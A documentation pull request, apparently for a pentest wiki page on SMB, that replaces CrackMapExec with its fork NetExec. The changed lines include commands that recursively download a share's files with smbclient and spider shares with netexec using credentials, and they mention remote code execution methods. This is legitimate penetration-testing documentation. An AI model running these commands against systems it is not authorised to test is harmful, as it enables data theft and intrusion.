+Tools like [smbclient](https://www.samba.org/samba/docs/current/man-html/smbclient.1.html) and [NetExec](https://github.com/Pennyw0rth/NetExec) can be used to recursively download a SMB share's content.
 
 ```bash
 # In an smbclient interactive session
@@ -85,8 +85,8 @@ recurse ON
 prompt OFF
 mget *
 
-# With crackmapexec
-crackmapexec smb $TARGETS -u $USERNAME -p $PASSWORD -M spider_plus -o READ_ONLY=False
+# With netexec
+netexec smb $TARGETS -u $USERNAME -p $PASSWORD -M spider_plus -o READ_ONLY=False
 ```
 
 ### 🛠️ Authenticated RCE
@@ -161,11 +161,11 @@ Dcomexec has a similar approach to psexec but it is executing commands through D
 Exploit
 {% endembed %}
 
-Crackmapexec is a swiss army that has featured a lot of the command execution methods mentionned precedently.
+netexec is a swiss army that has featured a lot of the command execution methods mentionned precedently.
 
 One of its feature is to automate the process of executing code via SMB by switching between methods when one fails.
 
-{% embed url="https://github.com/mpgn/CrackMapExec" %}
+{% embed url="https://github.com/Pennyw0rth/NetExec" %}
 
 ### 🛠️ Unauthenticated RCE
 


### PR DESCRIPTION
As cme is now archived, there is no point of directing users to a deprecated tool while nxc (the fork of cme) is currently maintained :)